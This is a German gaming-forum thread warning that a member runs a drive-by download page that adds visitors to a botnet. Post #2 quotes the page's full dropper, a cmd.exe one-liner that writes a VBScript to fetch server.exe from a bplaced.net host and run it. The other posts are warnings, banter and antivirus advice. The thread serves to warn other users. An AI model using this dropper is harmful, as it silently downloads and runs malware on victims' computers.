|
You last visited: Today at 04:46
Advertisement
Warnung vor 4C1D
Discussion on Warnung vor 4C1D within the Metin2 Private Server forum part of the Metin2 category.
05/14/2011, 19:14
|
#1
|
elite*gold: 0 
Join Date: Jan 2011
Posts: 1,484
Received Thanks: 3,151
|
Warnung vor 4C1D
Guten Abend e*pvp,
ich möchte euch vor 4C1D warnen!
Er hat eine Homepage in seiner Away, mit einem sogenannten
"Javadriveby" was während ihr die Seite besucht, einen Virus
runterlädt und euch seinem Botnet hinzufügt!
So eine ähnliche Aktion gabs vor einiger Zeit schonmal von mir,
doch ich habe erkannt, dass das scheiße war.
Die Seite fängt mit  an. Passt bitte auf.
Ich poste das in diesem Bereich, da man vorallem hier Nico aka 4C1D
kennt.
Ich habe Nico auch bereits gesagt, er soll die Seite down nehmen,
sonst werde ich dafür sorgen, dass sie down geht.
Mit freundlichen Grüßen,
Daroo
|
|
|
|
05/14/2011, 19:16
|
#2
|
elite*gold: 58
Join Date: Jun 2008
Posts: 2,311
Received Thanks: 8,420
|
Das Script das ausgeführt wurde:
Code:
cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs http://aaaccciiiddd.bplaced.net/server.exe %temp%\update.exe'
Achtung!
Padmak
|
|
|
|
|
05/14/2011, 19:17
|
#3
|
elite*gold: 35
Join Date: Jun 2009
Posts: 2,187
Received Thanks: 6,906
|
Wer ihn in skype hat geht auf keinen fall auf den link in seinem profil!!!!!1
|
|
|
|
|
05/14/2011, 19:18
|
#4
|
elite*gold: 58
Join Date: Jun 2008
Posts: 2,311
Received Thanks: 8,420
|
Achja, die Seite ist auch schon als Abuse gemeldet bei bplaced
Sollte also bald off sein
Padmak
|
|
|
|
|
05/14/2011, 19:20
|
#5
|
elite*gold: 3
Join Date: Aug 2009
Posts: 193
Received Thanks: 15
|
Good Job!
|
|
|
|
|
05/14/2011, 19:21
|
#6
|
elite*gold: 120
Join Date: Jul 2008
Posts: 2,403
Received Thanks: 1,594
|
Hmm war schon drauf.. Dann kam etwas von aktivieren or so.. dann hab ich die Seite wieder geschlossen :S
|
|
|
|
|
05/14/2011, 19:22
|
#7
|
elite*gold: 3
Join Date: Aug 2009
Posts: 193
Received Thanks: 15
|
Quote:
Originally Posted by anil the alpacino
Hmm war schon drauf.. Dann kam etwas von aktivieren or so.. dann hab ich die Seite wieder geschlossen :S
|
Jetzt bist du Infiziert mit dem Virus 
|
|
|
|
|
05/14/2011, 19:23
|
#8
|
elite*gold: 0
Join Date: Apr 2011
Posts: 218
Received Thanks: 185
|
Dank Daroo, habe ich auch erkannt dass es scheiße war 
PS: Padmak & Crank sind doof  aber Padmak mehr, da er denkt das die Seite offline gehen würde.
4C1D
|
|
|
|
|
05/14/2011, 19:23
|
#9
|
elite*gold: 58
Join Date: Jun 2008
Posts: 2,311
Received Thanks: 8,420
|
Jein, ich denke mal er nimmt das BN runter
Lass einfach Virenscanner durchlaufen, sein Virus wird auch erkannt von allen Scannern
€: WAS? ICH?
Ich hab EXTRA view-source: davorgehabt!
Reinkopieren, NICHT draufdrücken :>
Musst schon genau lesen
Padmak
|
|
|
|
|
05/14/2011, 19:26
|
#10
|
elite*gold: 15
Join Date: Jul 2010
Posts: 3,926
Received Thanks: 1,158
|
wer vor 4C1D angst hat, der hat keine ahnung von pcs. alles wirklich alles was von ihm kommt in richtung virus usw. ist mit maleware bytes bzw. avira antivir runter zu bekommen da der scheiss den er sich dort zurecht bastelt aus tuts besteht und nicht aus eigen wissen.
aber trotzdem thx^^
|
|
|
|
|
05/14/2011, 19:26
|
#11
|
elite*gold: 3
Join Date: Aug 2009
Posts: 193
Received Thanks: 15
|
Toll Padmak ich habe jetzt auf die Seite geklickt .. Was jetzt ? :P
€: dann bin ich wohl auch ein Infizierter  oo
:drama . Stufe10:
|
|
|
|
|
05/14/2011, 19:27
|
#12
|
elite*gold: 20
Join Date: Oct 2010
Posts: 1,303
Received Thanks: 457
|
Mal was ganz neues... xD
|
|
|
|
|
05/14/2011, 19:27
|
#13
|
elite*gold: 35
Join Date: Jun 2009
Posts: 2,187
Received Thanks: 6,906
|
Quote:
Originally Posted by wegus
Dank Daroo, habe ich auch erkannt dass es scheiße war
PS: Padmak & Crank sind doof aber Padmak mehr da er denkt die Seite würde offline gehen. |
Und warum bin ich doof? :'(
|
|
|
|
|
05/14/2011, 19:28
|
#14
|
elite*gold: 15
Join Date: Jul 2010
Posts: 3,926
Received Thanks: 1,158
|
4C1D du bist nen lowi 
dein botnetz wird immer kleiner weil immer mehr leute das programm löschen
|
|
|
|
|
05/14/2011, 19:29
|
#15
|
elite*gold: 0
Join Date: Apr 2011
Posts: 218
Received Thanks: 185
|
Quote:
Originally Posted by .Scy
wer vor 4C1D angst hat, der hat keine ahnung von pcs. alles wirklich alles was von ihm kommt in richtung virus usw. ist mit maleware bytes bzw. avira antivir runter zu bekommen da der scheiss den er sich dort zurecht bastelt aus tuts besteht und nicht aus eigen wissen.
aber trotzdem thx^^
|
Wer die Ressourcen kennt, weiß dass manche kostenpflichtig sind (ich aber sicherlich nicht gezahlt habe) oder ich mache sie selber, dass ist keine Arbeit bzw. keine Kunst.
Quote:
Originally Posted by .Scy
4C1D du bist nen lowi |
Hab dich auch Lieb <3
@ Crank
I love u <3
|
|
|
|
All times are GMT +1. The time now is 04:46.
|
|
